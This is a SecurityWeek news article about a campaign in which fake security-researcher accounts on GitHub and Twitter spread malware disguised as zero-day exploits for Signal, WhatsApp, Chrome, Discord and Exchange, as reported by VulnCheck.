Connect with us

Hi, what are you looking for?


Application Security

Fake Security Researcher Accounts Pushing Malware Disguised as Zero-Day Exploits

Fake security researcher accounts seen distributing malware disguised as Chrome, Signal, WhatsApp, Discord and Exchange zero-day exploits.

Exploit and vulnerability intelligence provider VulnCheck has issued a warning over fake security researcher accounts distributing malware disguised as zero-day exploits for popular software. 

The campaign was discovered in early May, when VulnCheck came across a GitHub repository hosting code that its author claimed to be a zero-day for the Signal messaging application. 

Throughout May, the cybersecurity firm continued finding such accounts on GitHub, offering what they claimed to be zero-day exploits for applications such as WhatsApp, Chrome, Discord, and Microsoft Exchange.

More recently, VulnCheck noticed that the campaign’s operator has also started creating Twitter accounts that appear to belong to security researchers and using them to lure people to GitHub repositories hosting the fake zero-day exploits.

The fake researcher accounts on Twitter have profile pictures — in some cases they are the photos of known researchers — and they claim to be associated with High Sierra Cyber Security, an entity that does not seem to exist. 

The code hosted in the GitHub repositories is designed to download a malicious binary and execute it. The downloaded binary can be a Windows or Linux file, depending on the victim’s operating system. A brief analysis of these binaries makes it obvious that they are malware.  

“The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware. It’s unclear if they have been successful, but given that they’ve continued to pursue this avenue of attacks, it seems they believe they will be successful,” VulnCheck said.

The GitHub accounts seen by VulnCheck have been suspended, but the fake Twitter accounts are still online at the time of writing.

Advertisement. Scroll to continue reading.

It’s unclear if this is a campaign run by a threat actor or if it’s part of some sort of experiment, but the cybersecurity community has been advised to act with caution when executing code from untrusted sources.  

Sophisticated threat actors targeting security researchers is not unheard of. In 2021, Google warned that North Korean hackers had delivered malware to security researchers after gaining their trust. 

Research conducted recently by Leiden University showed that GitHub hosted hundreds of malicious repositories advertised as proof-of-concept (PoC) exploits. 

Related: South American Cyberspies Impersonate Colombian Government in Recent Campaign

Related: Iranian APT Leaks Data From Saudi Arabia Government Under New Persona

Related: Python, JavaScript Developers Targeted With Fake Packages Delivering Ransomware

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join security experts as they discuss ZTNA’s untapped potential to both reduce cyber risk and empower the business.


Join Microsoft and Finite State for a webinar that will introduce a new strategy for securing the software supply chain.


Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.

Application Security

PayPal is alerting roughly 35,000 individuals that their accounts have been targeted in a credential stuffing campaign.

Application Security

GitHub this week announced the revocation of three certificates used for the GitHub Desktop and Atom applications.

Application Security

A CSRF vulnerability in the source control management (SCM) service Kudu could be exploited to achieve remote code execution in multiple Azure services.

Application Security

Drupal released updates that resolve four vulnerabilities in Drupal core and three plugins.

Application Security

Fortinet on Monday issued an emergency patch to cover a severe vulnerability in its FortiOS SSL-VPN product, warning that hackers have already exploited the...

Application Security

Many developers and security people admit to having experienced a breach effected through compromised API credentials.